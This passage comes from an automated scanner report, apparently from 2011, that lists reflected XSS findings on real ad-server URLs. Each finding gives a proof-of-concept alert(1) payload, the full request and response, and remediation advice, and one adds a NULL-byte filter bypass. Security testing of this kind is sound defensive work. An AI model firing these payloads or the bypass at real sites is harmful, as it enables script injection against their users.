The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b100"-alert(1)-"c812f1ccf3a was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:02 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... t/2285348/Backup_300x250_3.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028641b100"-alert(1)-"c812f1ccf3a&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307- ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcb7'-alert(1)-'a3cc98cbbe4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:07 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028646dcb7'-alert(1)-'a3cc98cbbe4&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307- ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2ad1"-alert(1)-"9a23308a41e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:33 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345d2ad1"-alert(1)-"9a23308a41e&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b81a'-alert(1)-'8f6882adeee was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:38 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=7062843456b81a'-alert(1)-'8f6882adeee&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7 ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5714b"-alert(1)-"7ab23438929 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:54 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e095714b"-alert(1)-"7ab23438929&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d409'-alert(1)-'ae76b5e7e5a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e093d409'-alert(1)-'ae76b5e7e5a&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b38'-alert(1)-'182e7bb676f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:49 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM128b38'-alert(1)-'182e7bb676f&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c920b"-alert(1)-"e348b200b0b was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:43 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1c920b"-alert(1)-"e348b200b0b&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c9f'-alert(1)-'38d64f32497 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284b8c9f'-alert(1)-'38d64f32497&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b858"-alert(1)-"13c1c8366ff was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:23 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 50.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=224352842b858"-alert(1)-"13c1c8366ff&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d532'-alert(1)-'1d043040bff was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:18 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G1d532'-alert(1)-'1d043040bff&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7db61"-alert(1)-"ea3173da7b3 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:12 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 85348/Backup_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G7db61"-alert(1)-"ea3173da7b3&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791c5"-alert(1)-"f835b416d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:04 GMT Expires: Wed, 03 Aug 2011 13:14:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=791c5"-alert(1)-"f835b416d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63093'-alert(1)-'655f6b8ed5a was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:09 GMT Expires: Wed, 03 Aug 2011 13:14:09 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... \" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=63093'-alert(1)-'655f6b8ed5ahttp://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399101/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5808c'-alert(1)-'66a05006c64 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:12:57 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!5808c'-alert(1)-'66a05006c64&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B677 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d67aa"-alert(1)-"2267e9f64d1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:12:51 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://s0.2mdn.net/2285348/Backup_300x250_2.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!d67aa"-alert(1)-"2267e9f64d1&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B677 ...[SNIP]...
2.37. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.accelerator-media.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>f23b2653513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=120x60&section=17223&IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1 HTTP/1.1 Host: ad.accelerator-media.com Proxy-Connection: keep-alive Referer: http://subscription.live-astro.com/free_reading_template.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:12:02 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 03 Aug 2011 13:12:02 GMT Pragma: no-cache Content-Length: 4766 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ad.accelerator-media.com/imageclick?IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1&Z=120x60&s=17223&_salt=1686391806&t=2" target="_parent"> ...[SNIP]...
2.38. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.accelerator-media.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ddff"-alert(1)-"a65d95cec7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=120x60&section=17223&IASH=STAND&7ddff"-alert(1)-"a65d95cec7c=1 HTTP/1.1 Host: ad.accelerator-media.com Proxy-Connection: keep-alive Referer: http://subscription.live-astro.com/free_reading_template.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:12:04 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 03 Aug 2011 13:12:04 GMT Pragma: no-cache Content-Length: 4721 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.accelerator-media.com/imp?7ddff"-alert(1)-"a65d95cec7c=1&IASH=STAND&Z=120x60&s=17223&_salt=4179874164";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_da ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb22"-alert(1)-"76c61c26f6c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5615 Date: Wed, 03 Aug 2011 12:57:45 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/j%3B244100576%3B0-0%3B0%3B67832026%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430379/115855006/direct/01%3fhref=ecb22"-alert(1)-"76c61c26f6chttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWind ...[SNIP]...
2.40. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4189.MSN/B5731231.62
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005bd38"-alert(1)-"5de68b6a66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bd38"-alert(1)-"5de68b6a66b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5665 Date: Wed, 03 Aug 2011 13:10:27 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /click%3Bh%3Dv8/3b58/f/6f/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=&%005bd38"-alert(1)-"5de68b6a66b=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f8c2"-alert(1)-"b666318228d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5611
Date: Wed, 03 Aug 2011 13:10:09 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=5f8c2"-alert(1)-"b666318228dhttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWind ...[SNIP]...
2.42. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.66 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4189.MSN/B5731231.66
Issue detail
